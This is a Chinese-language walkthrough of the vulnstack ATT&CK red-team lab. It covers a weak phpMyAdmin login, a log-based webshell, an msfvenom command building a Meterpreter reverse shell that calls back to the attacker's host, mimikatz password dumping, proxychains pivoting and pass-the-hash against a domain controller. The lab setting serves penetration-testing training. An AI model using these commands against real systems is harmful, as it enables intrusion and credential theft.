ATT&CK紅隊實戰靶場初探(一)
VSole2021-07-23 17:00:18
一、環境配置
靶機下載地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2
攻擊示意圖:

靶機統一使用虛擬機搭建
- web服務器:windows7 ip:192.168.52.143/192.168.154.152
- 域成員:windows server 2003 ip:192.168.52.141
- 域控:windows server 2008 ip:192.168.52.138
- 攻擊機:kali ip:192.168.154.146
二、外網打點
nmap掃描ip,看一下開了哪些端口

開了80和3306,訪問80

是個探針,知道網站路徑和php版本信息
上dirsearch掃一下目錄

有phpMyAdmin

試下弱口令,root/root進去了
然后就是getshell,這里參考:https://cloud.tencent.com/developer/article/1540506,用的是日志getshell




寫完shell蟻劍連上去,成功getshell


三、內網滲透
1、用msf生成exe上線,聯動cs
msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.154.146 LPORT=4444 -f exe -o shell.exe
msf設置


通過蟻劍上傳木馬,執行
成功得到session

打開cs,設置監聽器

在msf中使用exploit/windows/local/payload_inject模塊,session設置為剛獲得的session
set payload windows/meterpreter/reverse_http


執行,cs成功上線
2、信息收集
(1)mimikatz提取賬號明文密碼
(2)post/windows/gather/enum_applications模塊獲取軟件列表

(3)get_local_subnets獲取子網信息+內網流量轉發(msf+proxychains)
獲得內網網段為192.168.52.0/24
run autoroute -s 192.168.52.0/24
添加路由讓msf可以掃描網段

msf運行socks4a模塊,并且修改/etc/proxychains.conf的最后一行為相對應的代理端口

(4)arp掃描內網存活主機

(5)PTH攻擊拿下域控


VSole
網絡安全專家

